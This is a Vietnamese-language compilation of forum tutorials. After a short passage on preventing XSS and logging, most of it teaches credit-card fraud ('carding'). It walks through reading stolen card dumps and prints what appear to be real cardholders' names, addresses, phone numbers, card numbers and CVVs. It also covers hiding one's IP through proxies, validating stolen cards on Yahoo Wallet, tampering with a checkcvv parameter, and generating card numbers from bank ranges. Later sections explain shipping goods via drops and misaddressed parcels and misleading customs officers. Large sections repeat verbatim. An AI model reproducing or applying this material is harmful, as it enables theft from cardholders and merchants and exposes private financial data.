• Chống XSS : XSS là một lỗi khá thông dụng hacker có thể sử dụng lỗi này để chôm chỉa cookies v…v…Để chống lỗi này bạn nên làm như sau:
- Loại bỏ tất cả các tag html ( có thể sử dụng lệnh có sẵn) hoặc thay thể các kí tự đặc biệt như <,>,….
- Ngoài ra, những kí tự như: ;,:,//,… bạn nên xoá bỏ hoặc thay thế thanh mã hex của nó
Logging
• Logging là một kĩ thuật bảo mật khá đơn giản nhưng hiệu quả.
• Bạn nên log lại những thông tin về lỗi trên Website , rất có thể lỗi đó rất nguy hiểm có thể ảnh hưởng đến Website của bạn
• Bạn có thể chỉ cần bỏ thời gian viết những đoạn script logging đơn giản để có thể log lại những hoạt động bất hợp pháp trên Website của bạn.
• Sử dụng error_log() ( PHP ) , Err (ASP ), … là bạn có thể log lại bất cứ các err nào trên Website của bạn.
• Hiện nay , hầu như tất cả các Website lớn đều đặt Logging …
3-NHUNG BAI HOC CO BAN SHIP HANG
BÀI 1 : Một số
kiến thức cơ bản
Thế nào là Frauding?
--> là thực hiện các vụ chuyển khoản trực tuyến một cách phi pháp
Credit card: Thẻ tín dụng (viết tắt là cc)
Phần 1: CÁCH ĐỌC CC
Thông tin trong 1 cc gồm:
* CC number: gồm 16 chữ số(Riêng American Express có 15 digits)
Nếu chữ số đầu tiên của dãy là : 4 -->VISA
5 --> Master Card (MC)
6 --> Discover
3 --> American Express (AMEX)
* CVN (CVV) : Card Verification Number : gồm 3 chữ số (AMEX có 4 chữ số)
* Zip code (Postal code) :là 5 chữ số nếu cc ở USA.Từ Zip code có thể tìm được ra tên City và State tại local.yahoo.com . Nếu cc ở nước khác --> Dựa vào kinh nghiệm xem cc của bạn
Các cổng thanh toán trực tuyến chỉ check được 3 thông số trên,nghĩa là các thông số còn lại bạn có thể bịa ra được.Nếu shop gọi tới bank thì ko chơi được.(Một số thẻ bọn nó còn ko check đc zipcode nữa(dạy sau))
Các thông số khác:
Name on card : tên chủ thẻ
Expired date: ngày hết hạn
Address: địa chỉ
City: thành phố
State: bang
Country: quốc gia
Telephone number: số điện thoại
email ,...
Ví dụ 1:
First Name Michael
Last Name Delk
Address 170 Island Grove Drive
City Merritt Island
State FL
Post Code 32952
Country USA
Email mdelk@cfl.rr.com
Phone (321) 449-9223
Payment Information
Payment Type Visa
Name on Card Michael L Delk
Card Number 4104 1300 1744 2783
Expiry Date mm/yy 11/06
Card Holder Address 170 Island Grove Dr, Merritt Island, FL 32952
Authorization CVN 151 --> số cvv
Xét dòng "Card Holder Address 170 Island Grove Dr, Merritt Island, FL 32952" :
170 Island Grove Dr là address
Merritt Island là City
FL là viết tắt của Florida --> state
32952 --> Zipcode
Ví dụ 2:
4121741632932567/409/0705/310 New River Rd/02838
02838 --> Zipcode => city và state
310 New River Rd --> address
0705 => Exp date là 07/2005
409 => CVV
Ví dụ 3:
ruheena mendes|3 darcy place|bromley|BR2 0RY|kent|NULL|ruaj98@yahoo.co.uk|||02084642404|Swi tch|6759677145117227|07/06|307|
đây là Switch (Discover có đầu là 6011) của UK
ruheena mendes --> tên chủ thẻ
3 darcy place --> address
bromley --> city
BR2 0RY --> Zipcode
kent --> state
02084642404 -> tel
307:CVV
Phần 2: Faking IP (IP giả)
Phải Fake IP vì lúc pay , bọn nó log lại IP của mình.Mình fake để giả như mình đang ở 1 vị trí nào đó mình muốn.
Fake IP : 2 cách : dùng Proxy hoặc Sock
Trong Internet Explorer (IE) , vào Tools --> Internet Options... --> Connections --> LAN Settings... ---> thấy bảng Proxy server
Vào các site cho proxy/sock để lấy.
Ví dụ:
69.110.237.115:3128 elite proxy USA
69.110.237.115 --> IP
3128 --> port
chọn "Use a proxy server ..."
điền vào ô nếu là proxy.
Nếu là sock thì vào Advanced... --> bỏ "use the same proxy server ..." --> điền sock vào socks. --> OK
Vào google.com . Nếu nó ko vào google.com.vn --> Okay
Nếu ko vào được --> IP die. Chọn proxy/sock khác.
Lưu ý: ko dùng proxy có port 80 / 8000
Proxy xịn: có ghi anonymous
sock xịn : sock v4,5
Các site để lấy proxies /socks:
http://www.samair.ru/proxy
http://proxydrom.com
http://openproxies.com
http://proxy4free.com
hxxp://www.atomintersoft.com/products/alive-proxy/socks4-list/
hxxp://www.atomintersoft.com/products/alive-proxy/socks5-list/
hxxp://proxy.phpup.com/socks.php
hxxp://www.shadowicq.com/freesocks.html
Còn đây là site check proxy có che giấu tốt hay ko:
1)hxxp://www.zbb.jp/unknown/cgi-bin/prxjdg.cgi
Trang này chạy engine proxyjudge. Anonylevel cao nhất là 1, rồi giảm dần.
2)hxxp://www.ip2location.com
Trang này check ip chính xác tới tận kinh tuyến, vĩ tuyến. Nếu vào bằng proxy (hay sock) mà nó ko ghi nguồn gốc VN thì ip đó ngon.
Sau khi học xong bài 1, bạn có thể học tiếp bài 2.
Trong bài này , tôi sẽ dạy các bạn cách check CC hiệu quả , nhanh gọn nhất qua wallet.yahoo.com mà không làm CC die.
Điều kiện cần: Vài con CC, 1 account của Yahoo.
* Nguyên lý 1: Yahoo wallet check được gì thì các payment gates cũng chỉ check được như vậy , trừ khi call bank.
Áp dụng nguyên lý 1 ta có thể điền Billing address = Shipping address . Đối với những CC không check được cả Zipcode thì càng dễ ship cho dropper ở các nước có sử dụng Zipcode(thực ra thành phố nào của VN cũng có Zipcode nhưng ở VN cái đó chưa thông dụng nên mình điền thế nào cũng được).Bọn bưu điện gửi hàng thì không nhìn vào Zipcode , chỉ khi nào tên thành phố / Bang sai --> Correct address bằng cách xem Zipcode.
Hiểu rõ nguyên lý 1 là điều rất quan trọng cho việc phát triển cách ship hàng sau này.
Các bước thực hiện (Ví dụ đối với việc check cc USA) :
+ Vào wallet.yahoo.com , Log in
+ Trong lần check CC đầu tiên , bạn có thể điền đúng , đầy đủ thông tin như trên CC.Nếu trên CC info không có số điện thoại --> điền bừa vào.Địa chỉ email thì điền của mình.City và State nếu không thấy ghi thì vào local.yahoo.com sẽ thấy.
+ Submit CC
+ Nếu nó accept CC của mình (Đã save lại được CC ) --> CC sống , còn không là CC die.
+ Đến lần thử sau(kể cả lần trước cc die) , bạn chỉ cần thay lại CC number , Loại thẻ --> Submit
+ Nếu nó ghi là : "The zip code you entered must match your credit card's billing address" hoặc là sai Postal code thì có nghĩa là CC đó sống.Nếu ghi là "Invalid card" --> Die.
+ Nếu zipcode mình điền không đúng với zipcode của cc mà vẫn Save lại được có nghĩa là cái CC đó bọn nó không check được zipcode --> ngon lắm đấy.Cái này có thể khai gian luôn cả zipcode lúc mua hàng , thích hợp với việc ship qua dropper.
Lưu ý:
+ Các loại CC khác nhau:
- CC US,Canada,UK : thường check được CC number,CVN,Zip code . Nếu CC loại này mà có con điền sai Zipcode mà vẫn save vào Yahoo Wallet được --> xịn đó.
- CC EU,JP : CC number , Expiration date , CVN . (Nếu ghi sai exp date lúc check --> sẽ bị ghi là invalid)
- Một số CC có thể check được cả Exp date + Zip code đồng thời.
Đối với mọi CC : Các payment gate chỉ check được nhiều nhất đồng thời cả CC number,Exp date ,CVN,Zipcode . Không có trường hợp ngoại lệ, trừ khi contact bank.
+ Mỗi lần Yahoo! Wallet chỉ cho check 25 con.Yahoo wallet record lại IP của bạn và tên account bạn đã check.Vì vậy bạn phải đợi 5 tiếng sau mới check được tiếp hoặc phải :
- Logout cái đó, login vào account khác
- Sau khi Login xong --> Fake IP
- Lại check tiếp
+ CC die là do Bank phong tỏa tài khoản đó hoặc chủ thẻ yêu cầu khóa tài khoản.
+ Nếu Yahoo! Wallet yêu cầu bạn nhập cả CVN , bạn có thể ấn F6 --> Tìm trên dòng đó đoạn checkcvv=1 --> sửa lại thành checkcvv=0 và Enter.
Bài học frauding số 3
Lưu ý : Phải học chắc bài số 1 và 2 thì mới tiếp tục được bài số 3.Làm gì cũng phải có kiến thức cơ bản từ gốc rễ lên.
Điều kiện cần:
+ Đã nắm vững kiến thức cơ bản của bài 1 và 2
+ Có 1 con cvv ngon
+ Có 1 proxy anonymous / 1 sock ngon
+ May mắn
PHẦN 1:Mua hàng hóa phi vật thể
Trong phần này , tui sẽ chỉ cho bạn cách mua những hàng hóa phi vật thể qua Internet , có nghĩa là không sờ , đụng chạm vào nó được . Ví dụ : mua softwares,hosting account,tên miền, account download ,thẻ điện thoại quốc tế,...
Các bước thực hiện:
+ Check lại CC
+ Fake IP
+ Vào site cần mua , tìm hàng , add to cart --> Check out
+ Bắt đầu điền thông tin vào phần Billing như đã dạy ở bài 1.Bạn có thể tùy ý điền thông tin thật hoặc điền thông tin giả nhưng giữ nguyên Zip code.Để tỉ lệ thành công cao hơn, bạn điền đúng thông tin trong CC nhưng sửa lại phần Name là tên của bạn. Điền địa chỉ email của bạn để bọn nó gửi licence key đến.
+ Check out
PHẦN 2: Mua hàng hóa dạng vật thể qua mạng
Cái này còn gọi là "Ship hàng" . Những hàng được mua có thể là giầy dép, quần áo,PDA,nhẫn,tạp chí,... về VN
Các bước thực hiện : Giống hệt như mua hàng hóa dạng phi vật thể, tuy nhiên có một số khác biệt sau:
+ Áp dụng phương pháp khai billing address = shipping address :
Như đã nói ở bài học số 1 , các payment gate chỉ check được CC number , CVN (CVV, Authorization Number) , Zipcode . Vì vậy khi điền Billing form, bạn sẽ chỉ điền đúng các thông số trên.Phần Shipping address bạn điền giống hệt Billing address.Bọn shop thấy hàng gửi đến chủ thẻ --> dễ dàng chấp nhận hơn.
+ Áp dụng phương pháp ship nhầm nước:Vì hầu hết các shop cho ship toàn cầu đều đã cấm Vietnam nên bạn sẽ không thể ship về nhà mình mà không áp dụng phương pháp này.Bạn sẽ điền Shipping và Billing Country là 1 nước nào đó như Singapore, Hong Kong, France , .....(nên để country trùng với country của chủ thẻ)
Cơ chế: khai thác lỗ hổng : Bọn shipper ( vận chuyển) như USPS,UPS,DHL,FedEx sẽ ship đến nước ghi nhầm đó. Sau khi hàng đến , bọn nó không tìm thấy thành phố Hanoi --> sẽ search lại và tìm thấy nó ở VN --> chuyển lại về VN miễn phí cho mình.
Nếu bọn nó đã send lại email cho mình ( không phải confirmation email) là order shipped thì gần như chắc chắn bạn sẽ nhận được hàng.
Lưu ý:
+ Ship qua bọn shipper rẻ tiền như USPS là kiểu Airmail hay Surface Post --> về Bưu điện Hanoi , bạn sẽ nhận được giấy báo ra bưu điện nhận hàng.Ở đó bạn sẽ gặp mấy ông Hải quan và có thể sẽ xin được giảm thuế đễn zero.Bạn phải làm sao cho mấy ông đó nghĩ rằng hàng đó ít tiền,mục đích là để mình sử dụng chứ không phải đem bán, mình còn là học sinh , SV --> ít tiền.Tốt nhất là lám sao cho bọn nó không thấy được tờ Invoice.
Ship qua Airmail như vậy sẽ giảm thuế và chắc chắn sẽ về VN nhưng đợi hơi lâu ( ship gián tiếp như vậy mất 3->4 tuần)
+ Ship qua shipper xịn (Courier Shipper) thì sẽ nhanh , mất khoảng 1 tuần nhưng bạn sẽ không xin giảm thuế được.Bạn có quyền trả lại hàng nếu thuế quá cao.Với lại , ship qua Courier Shipper sẽ có tracking number để theo dõi đường đi của hàng hằng ngày nhưng sẽ có rủi ro bị giữ lại hàng vì shop gửi email cho bọn nó đòi giữ lại hàng.
Mở rộng : ship nhầm nước + nhầm tỉnh : VD Ghi như sau:
Address: 123 Thai Ha - Hanoi
City: Hai Phong
Phụ lục : Cách tìm shops
i) Ship cho dropper :
US : shopping.com , froogle.com --> điền mã hàng cần mua . VD : hx4705
UK,EU: kelkoo.com , froogle.co.uk
AU: shopbot.com.au
Froogle và Google: Keywords: VD: shop hx4705 .com.au
ii)Ship gián tiếp về Vietnam:
Vì áp dụng phương pháp ship nhầm nước nên bạn chỉ cần tìm shop cho ship international là có thể về được VN.(kể cả shop chỉ ship trong 1 châu lục)
Dùng froogle/google:
Keywords: VD: shop hx4705 "international shipping" .co.uk cart
"worldwide shipping"
USPS Global
Phụ luc 2: Cách xin giảm thuế lúc gặp Hải quan:
Cách này chỉ áp dụng được đối với hàng ship về VN mà bưu điện HN gửi giấy báo ra nhận hàng ( lúc ship bạn chọn shipping menthod loại rẻ tiền nhất , thường là dịch vụ Airmail , USPS,Royal Mail,Hong Kong post (loại của nhà nước), KHÔNG phải là UPS,FedEx hay DHL).
Bạn phải gặp Hải quan tại bưu điện.Lúc gặp,bạn có thể nói mình là học sinh --> ít tiền . Bạn nên nêu ra thêm các lý do để biện minh rằng:
+ Hàng không có giá trị cao (bọn HQ gà đối với những lô hàng bé.Tốt nhất là bạn làm thế nào để bọn nó không thấy Invoice hoặc làm thế nào đó để invoice khai khống (tức là khai giá trị thấp hơn).
+ Hàng mua về để mình dùng , không phải để đi đem bán.
-----> Xin được linh động.
Nếu ship ít --> cứ nói là nhận hàng lần đầu --> Không biết là phải đóng thuế nên cũng mang ít tiền.
Lời kết :
Bài viết của tôi chứa 2 kiến thức mới được công bố : phương pháp ship nhầm nước và cách điền Billing form (nguyên lý 1) . Công cụ mạnh nhất chính là Ship nhầm nước.Hơn nữa, khi ship bằng phương pháp này , Vietnam sẽ không bị mang tiếng xấu --> khó bị kiện --> các VNese Leaders sẽ không truy cứu và mình cũng sẽ được an toàn hơn.
Tại sao tôi ship hàng ? Bởi các lợi ích sau:
+ Cá nhân : Bạn sẽ cảm thấy sung sướng vì tự nhiên có đồ xịn , có tiền tiêu , hãnh diện với bạn bè.
+ Đất nước : tăng tổng sản phẩm quốc nội,cũng giống như bạn thu được ngoại tệ vậy --> Làm giàu cho đất nước.
+ Xã hội : các shops sau khi bị chơi xong sẽ tăng cường security
Tuy vậy, sau 2 năm rưỡi sử dụng CC và đã gặt hái được chút ít thành công , tôi quyết định từ bỏ việc sử dụng CC chùa từ tháng 10 này . Bởi dù thế nào,việc xài CC chùa cũng tương tự như việc bạn vào nhà 1 người rùi lấy cắp 1 chiếc xe máy của họ vậy, therefore that is not good . Furthermore , việc xài CC nhiều sẽ ảnh hưởng đến nhân cách của mình sau này(không đàng hoàng).Với lại, năm nay tui học lớp 12 , sắp phải thi ĐH , lại còn thi TOEFL và SAT nữa --> " Làm việc gì cũng phải có giới hạn "
Kinh nghiệm SHIP HÀNG
Phần 1 là thuật ngữ và 1 số kiến thức cơ bản, tuy dài dòng nhưng sẽ rất có ích nếu bạn hiểu nó. Phần 2 sẽ về các tips nhỏ để vượt qua gateway và shop.
1. Thuật ngữ:
.:. Drop : người nhận hàng cho bạn, có thể ở chung country hoặc ở country khác. Tại sao cần drop ? 1 số shop k0 ship đến country của bạn nên cần drop. Drop còn được dùng để làm fone vf cho bạn hoặc làm cho shipping name có vẻ hợp lệ hơn là 1 azn name ( asian ).
.:. Carding: dùng card của người khác để mua 1 thứ gì đó, online hoặc hàng thực sự.
.:. Cash out: lấy tiền mặt ra trực tiếp từ bank hoặc atm.
.:. Dump: data được viết lên lên ATM card. Data này theo format đã được encrypt theo algo của bank
.:. COB ( change of billing ): khi có 1 cc full info như mother name, SSN ( social security number, DOB ( date of birth ) vv, có thể call bank để kêu bank thay địa chỉ billing bằng địa chỉ của mình, lưu ý việc này là hoàn toàn hợp lệ.
.:. Bin: số xác định bank, là 6 số đầu tiên của cc.
2. Ship hàng
Cần lưu ý tới 1 số điểm sau:
Tuyệt đối đừng nên ship hàng bằng free mail. 1 số shop khi gặp free email sẽ cẩn thận và bắt buộc qua 1 số thủ tục. Và chuyện lấy 1 mail account như AOL account k0 khó. AOL cho phép 59 ngày trial, bạn chỉ cần có 1 cc hợp lệ và sẽ setup được 1 AOL account. Lưu ý AOL có 1 loại browser gọi là AOL browser, khi dùng cái này bạn sẽ connect vào AOL network và có 1 ip của AOL. ip này k0 bao giờ bị blacklist hoặc bị ban, vì nếu nó ban thì nó đã ban cả chục triệu người sử dụng AOL khác. 1 điểm khác khi lập AOL account là nên lấy account name trùng tên với cc, thí dụ như là jones.pro.shipper@aol có vẻ thật hơn là daicavn@aol.com
Hiểu payment gateway: paygate và bank gateway interface với nhau theo 2 bước: Pre-Authorization và AUthorization. Trong db của paygate có list các bank và interface, khi paygate nhận cc sẽ check 6 số đầu để biết bank nào và construct 1 string bao gồm cc+name+exp+address nếu có AVS ( address verification system) hoặc cc+name+exp nếu k0 có AVS và code Pre-Auth hoặc Auth. Thứ tự giữa cc name date tùy thuộc vào bank gateway. Sau khi nó construct string đó sẽ send tới bank, ở bước Pre-Authorization bank chỉ check xem cc đó có thuộc range của mình k0, và check cc đó và exp có match với nhau, cuối cùng là check limit ban đầu của cc có đủ mua món hàng đó k0. Tùy mỗi trường hợp bank sẽ tạo ra 1 response code gửi về cho gateway, như là insufficient fund, date not valid ( 2co báo lỗi date not valid là Do Not Honor ). Lưu ý ở bước Pre-Authorization này thực sự bank KHÔNG check database của mình, và cũng chưa charge cc. 1 số paygate có thể config real-time processing hoặc manual process, realtime thì paygate sẽ thực hiện Authorization luôn, có nghĩa là buộc bank phải query db của mình và fund tiền cho acc của paygate, từ đó paygate sẽ fund tiền cho merchant. Còn manual processing là paygate thực hiện Pre-Auth để coi tính hợp lệ của payment và sau đó sẽ gom cc đi charge 1 lượt ở bước Auth.
Biết được những thứ này để làm gì ? Trong mấy ngày qua, sss mò ra được bank range của 1 số bank bên AU nơi sss ở, và tự tạo ra cc valid, cc này được lợi ở chỗ nào: đây là cc valid sẽ qua được bước Pre-Auth vì bank sẽ check đúng range của mình, đúng exp và valid, thực sự cc k0 có thật trong bank. Cái này dùng để mua soft instant activation, mua hàng của whole seller hoặc mua mobile dạng plan ( dạng trả trước, verify cc valid nó sẽ send mobile cho mình rồi cuối mỗi tháng charge cc 1 lần). Cách làm những chuyện này sss sẽ post sau.
AVS là gì ? AVS là hệ thống check địa chỉ bill đối với những gateway bên us. Với những paygate bên us khi nhận 1 cc thuộc bank của us khi construct cái string để send cho bank gateway nó sẽ thêm vào đó địa chỉ của cc, bank sẽ thực hiện AVS và gửi response là address mismatch nếu địa chỉ sai. Nhưng cùng 1 gateway đó, nếu gặp cc k0 thuộc us như cc các nước châu á, cc finland thì nó k0 check được AVS do k0 có connection với bank và k0 có xác định được format của address. Chỉ những paygate lớn như paypal mới có thể check avs đối với bank international, và ngay cả paypal cũng k0 check được avs, cvv2 của các cc thuộc hk, bangladesh.
Điều này có lợi như thế nào: bạn mua hàng ở website us dùng cc 1 số nước khác như cc bangladesh, có thể bỏ địa chỉ bill = địa chỉ ship và làm cho transaction trở thành valid. Ngược lại mua site uk chẳng hạn bỏ cc k0 thuộc uk như cc us vào và bỏ địa chỉ mình vào vẫn có thể qua. Có rất nhiều site như vậy, sss chỉ thí dụ vài site: eddiebauer.com (hỏi mdblq xem ship thế nào) và lik-sang.com.
Tránh ship vào thứ 6: tuy những shop lớn như dell.com, apple.com thứ 7 k0 làm việc, nhưng tốt nhất bạn tránh những shop nhỏ hơn. shop owner có thể có login vào cuối tuần và review lại những order, nó càng có nhiều thời gian rảnh thì càng có khả năng phát hiện ra transaction là fraud.
IP: 1 public proxy từ đó xuất phát nhiều fraud order sẽ được liệt vào blacklist, và các order sử dụng proxy đó chắc chắn sẽ bị cancel hoặc bị red flag để qua confirmation. amazone và những site khác liên tục cập nhật blacklist. ngoài ra amazon còn maintain 1 list các address đen dính líu tới ship hàng. VD địa chỉ nhà của sss là 1 địa chỉ đen, cứ hễ ship sách amazon về số nhà sss là automatically cancelled sau 15 phút . Tuy nhiên amazon.com k0 dùng chung db với amazon.co.uk tuy 2 site giống nhau như 1. Do đó bạn bị blacklist amazon k0 có nghĩa là bạn bị blacklist ở .co.uk
Thế nào là Frauding?
--> là thực hiện các vụ chuyển khoản trực tuyến một cách phi pháp
Credit card: Thẻ tín dụng (viết tắt là cc)
Phần 1: CÁCH ĐỌC CC
Thông tin trong 1 cc gồm:
* CC number: gồm 16 chữ số(Riêng American Express có 15 digits)
Nếu chữ số đầu tiên của dãy là : 4 -->VISA
5 --> Master Card (MC)
6 --> Discover
3 --> American Express (AMEX)
* CVN (CVV) : Card Verification Number : gồm 3 chữ số (AMEX có 4 chữ số)
* Zip code (Postal code) :là 5 chữ số nếu cc ở USA.Từ Zip code có thể tìm được ra tên City và State tại local.yahoo.com . Nếu cc ở nước khác --> Dựa vào kinh nghiệm xem cc của bạn
Các cổng thanh toán trực tuyến chỉ check được 3 thông số trên,nghĩa là các thông số còn lại bạn có thể bịa ra được.Nếu shop gọi tới bank thì ko chơi được.(Một số thẻ bọn nó còn ko check đc zipcode nữa(dạy sau))
Các thông số khác:
Name on card : tên chủ thẻ
Expired date: ngày hết hạn
Address: địa chỉ
City: thành phố
State: bang
Country: quốc gia
Telephone number: số điện thoại
email ,...
Ví dụ 1:
First Name Michael
Last Name Delk
Address 170 Island Grove Drive
City Merritt Island
State FL
Post Code 32952
Country USA
Email mdelk@cfl.rr.com
Phone (321) 449-9223
Payment Information
Payment Type Visa
Name on Card Michael L Delk
Card Number 4104 1300 1744 2783
Expiry Date mm/yy 11/06
Card Holder Address 170 Island Grove Dr, Merritt Island, FL 32952
Authorization CVN 151 --> số cvv
Xét dòng "Card Holder Address 170 Island Grove Dr, Merritt Island, FL 32952" :
170 Island Grove Dr là address
Merritt Island là City
FL là viết tắt của Florida --> state
32952 --> Zipcode
Ví dụ 2:
4121741632932567/409/0705/310 New River Rd/02838
02838 --> Zipcode => city và state
310 New River Rd --> address
0705 => Exp date là 07/2005
409 => CVV
Ví dụ 3:
ruheena mendes|3 darcy place|bromley|BR2 0RY|kent|NULL|ruaj98@yahoo.co.uk|||02084642404|Swi tch|6759677145117227|07/06|307|
đây là Switch (Discover có đầu là 6011) của UK
ruheena mendes --> tên chủ thẻ
3 darcy place --> address
bromley --> city
BR2 0RY --> Zipcode
kent --> state
02084642404 -> tel
307:CVV
Phần 2: Faking IP (IP giả)
Phải Fake IP vì lúc pay , bọn nó log lại IP của mình.Mình fake để giả như mình đang ở 1 vị trí nào đó mình muốn.
Fake IP : 2 cách : dùng Proxy hoặc Sock
Trong Internet Explorer (IE) , vào Tools --> Internet Options... --> Connections --> LAN Settings... ---> thấy bảng Proxy server
Vào các site cho proxy/sock để lấy.
Ví dụ:
69.110.237.115:3128 elite proxy USA
69.110.237.115 --> IP
3128 --> port
chọn "Use a proxy server ..."
điền vào ô nếu là proxy.
Nếu là sock thì vào Advanced... --> bỏ "use the same proxy server ..." --> điền sock vào socks. --> OK
Vào google.com . Nếu nó ko vào google.com.vn --> Okay
Nếu ko vào được --> IP die. Chọn proxy/sock khác.
Lưu ý: ko dùng proxy có port 80 / 8000
Proxy xịn: có ghi anonymous
sock xịn : sock v4,5
Các site để lấy proxies /socks:
http://www.samair.ru/proxy
http://proxydrom.com
http://openproxies.com
http://proxy4free.com
hxxp://www.atomintersoft.com/products/alive-proxy/socks4-list/
hxxp://www.atomintersoft.com/products/alive-proxy/socks5-list/
hxxp://proxy.phpup.com/socks.php
hxxp://www.shadowicq.com/freesocks.html
Còn đây là site check proxy có che giấu tốt hay ko:
1)hxxp://www.zbb.jp/unknown/cgi-bin/prxjdg.cgi
Trang này chạy engine proxyjudge. Anonylevel cao nhất là 1, rồi giảm dần.
2)hxxp://www.ip2location.com
Trang này check ip chính xác tới tận kinh tuyến, vĩ tuyến. Nếu vào bằng proxy (hay sock) mà nó ko ghi nguồn gốc VN thì ip đó ngon.
Sau khi học xong bài 1, bạn có thể học tiếp bài 2.
Trong bài này , tôi sẽ dạy các bạn cách check CC hiệu quả , nhanh gọn nhất qua wallet.yahoo.com mà không làm CC die.
Điều kiện cần: Vài con CC, 1 account của Yahoo.
* Nguyên lý 1: Yahoo wallet check được gì thì các payment gates cũng chỉ check được như vậy , trừ khi call bank.
Áp dụng nguyên lý 1 ta có thể điền Billing address = Shipping address . Đối với những CC không check được cả Zipcode thì càng dễ ship cho dropper ở các nước có sử dụng Zipcode(thực ra thành phố nào của VN cũng có Zipcode nhưng ở VN cái đó chưa thông dụng nên mình điền thế nào cũng được).Bọn bưu điện gửi hàng thì không nhìn vào Zipcode , chỉ khi nào tên thành phố / Bang sai --> Correct address bằng cách xem Zipcode.
Hiểu rõ nguyên lý 1 là điều rất quan trọng cho việc phát triển cách ship hàng sau này.
Các bước thực hiện (Ví dụ đối với việc check cc USA) :
+ Vào wallet.yahoo.com , Log in
+ Trong lần check CC đầu tiên , bạn có thể điền đúng , đầy đủ thông tin như trên CC.Nếu trên CC info không có số điện thoại --> điền bừa vào.Địa chỉ email thì điền của mình.City và State nếu không thấy ghi thì vào local.yahoo.com sẽ thấy.
+ Submit CC
+ Nếu nó accept CC của mình (Đã save lại được CC ) --> CC sống , còn không là CC die.
+ Đến lần thử sau(kể cả lần trước cc die) , bạn chỉ cần thay lại CC number , Loại thẻ --> Submit
+ Nếu nó ghi là : "The zip code you entered must match your credit card's billing address" hoặc là sai Postal code thì có nghĩa là CC đó sống.Nếu ghi là "Invalid card" --> Die.
+ Nếu zipcode mình điền không đúng với zipcode của cc mà vẫn Save lại được có nghĩa là cái CC đó bọn nó không check được zipcode --> ngon lắm đấy.Cái này có thể khai gian luôn cả zipcode lúc mua hàng , thích hợp với việc ship qua dropper.
Lưu ý:
+ Các loại CC khác nhau:
- CC US,Canada,UK : thường check được CC number,CVN,Zip code . Nếu CC loại này mà có con điền sai Zipcode mà vẫn save vào Yahoo Wallet được --> xịn đó.
- CC EU,JP : CC number , Expiration date , CVN . (Nếu ghi sai exp date lúc check --> sẽ bị ghi là invalid)
- Một số CC có thể check được cả Exp date + Zip code đồng thời.
Đối với mọi CC : Các payment gate chỉ check được nhiều nhất đồng thời cả CC number,Exp date ,CVN,Zipcode . Không có trường hợp ngoại lệ, trừ khi contact bank.
+ Mỗi lần Yahoo! Wallet chỉ cho check 25 con.Yahoo wallet record lại IP của bạn và tên account bạn đã check.Vì vậy bạn phải đợi 5 tiếng sau mới check được tiếp hoặc phải :
- Logout cái đó, login vào account khác
- Sau khi Login xong --> Fake IP
- Lại check tiếp
+ CC die là do Bank phong tỏa tài khoản đó hoặc chủ thẻ yêu cầu khóa tài khoản.
+ Nếu Yahoo! Wallet yêu cầu bạn nhập cả CVN , bạn có thể ấn F6 --> Tìm trên dòng đó đoạn checkcvv=1 --> sửa lại thành checkcvv=0 và Enter.
Bài học frauding số 3
Lưu ý : Phải học chắc bài số 1 và 2 thì mới tiếp tục được bài số 3.Làm gì cũng phải có kiến thức cơ bản từ gốc rễ lên.
Điều kiện cần:
+ Đã nắm vững kiến thức cơ bản của bài 1 và 2
+ Có 1 con cvv ngon
+ Có 1 proxy anonymous / 1 sock ngon
+ May mắn
PHẦN 1:Mua hàng hóa phi vật thể
Trong phần này , tui sẽ chỉ cho bạn cách mua những hàng hóa phi vật thể qua Internet , có nghĩa là không sờ , đụng chạm vào nó được . Ví dụ : mua softwares,hosting account,tên miền, account download ,thẻ điện thoại quốc tế,...
Các bước thực hiện:
+ Check lại CC
+ Fake IP
+ Vào site cần mua , tìm hàng , add to cart --> Check out
+ Bắt đầu điền thông tin vào phần Billing như đã dạy ở bài 1.Bạn có thể tùy ý điền thông tin thật hoặc điền thông tin giả nhưng giữ nguyên Zip code.Để tỉ lệ thành công cao hơn, bạn điền đúng thông tin trong CC nhưng sửa lại phần Name là tên của bạn. Điền địa chỉ email của bạn để bọn nó gửi licence key đến.
+ Check out
PHẦN 2: Mua hàng hóa dạng vật thể qua mạng
Cái này còn gọi là "Ship hàng" . Những hàng được mua có thể là giầy dép, quần áo,PDA,nhẫn,tạp chí,... về VN
Các bước thực hiện : Giống hệt như mua hàng hóa dạng phi vật thể, tuy nhiên có một số khác biệt sau:
+ Áp dụng phương pháp khai billing address = shipping address :
Như đã nói ở bài học số 1 , các payment gate chỉ check được CC number , CVN (CVV, Authorization Number) , Zipcode . Vì vậy khi điền Billing form, bạn sẽ chỉ điền đúng các thông số trên.Phần Shipping address bạn điền giống hệt Billing address.Bọn shop thấy hàng gửi đến chủ thẻ --> dễ dàng chấp nhận hơn.
+ Áp dụng phương pháp ship nhầm nước:Vì hầu hết các shop cho ship toàn cầu đều đã cấm Vietnam nên bạn sẽ không thể ship về nhà mình mà không áp dụng phương pháp này.Bạn sẽ điền Shipping và Billing Country là 1 nước nào đó như Singapore, Hong Kong, France , .....(nên để country trùng với country của chủ thẻ)
Cơ chế: khai thác lỗ hổng : Bọn shipper ( vận chuyển) như USPS,UPS,DHL,FedEx sẽ ship đến nước ghi nhầm đó. Sau khi hàng đến , bọn nó không tìm thấy thành phố Hanoi --> sẽ search lại và tìm thấy nó ở VN --> chuyển lại về VN miễn phí cho mình.
Nếu bọn nó đã send lại email cho mình ( không phải confirmation email) là order shipped thì gần như chắc chắn bạn sẽ nhận được hàng.
Lưu ý:
+ Ship qua bọn shipper rẻ tiền như USPS là kiểu Airmail hay Surface Post --> về Bưu điện Hanoi , bạn sẽ nhận được giấy báo ra bưu điện nhận hàng.Ở đó bạn sẽ gặp mấy ông Hải quan và có thể sẽ xin được giảm thuế đễn zero.Bạn phải làm sao cho mấy ông đó nghĩ rằng hàng đó ít tiền,mục đích là để mình sử dụng chứ không phải đem bán, mình còn là học sinh , SV --> ít tiền.Tốt nhất là lám sao cho bọn nó không thấy được tờ Invoice.
Ship qua Airmail như vậy sẽ giảm thuế và chắc chắn sẽ về VN nhưng đợi hơi lâu ( ship gián tiếp như vậy mất 3->4 tuần)
+ Ship qua shipper xịn (Courier Shipper) thì sẽ nhanh , mất khoảng 1 tuần nhưng bạn sẽ không xin giảm thuế được.Bạn có quyền trả lại hàng nếu thuế quá cao.Với lại , ship qua Courier Shipper sẽ có tracking number để theo dõi đường đi của hàng hằng ngày nhưng sẽ có rủi ro bị giữ lại hàng vì shop gửi email cho bọn nó đòi giữ lại hàng.
Mở rộng : ship nhầm nước + nhầm tỉnh : VD Ghi như sau:
Address: 123 Thai Ha - Hanoi
City: Hai Phong
Phụ lục : Cách tìm shops
i) Ship cho dropper :
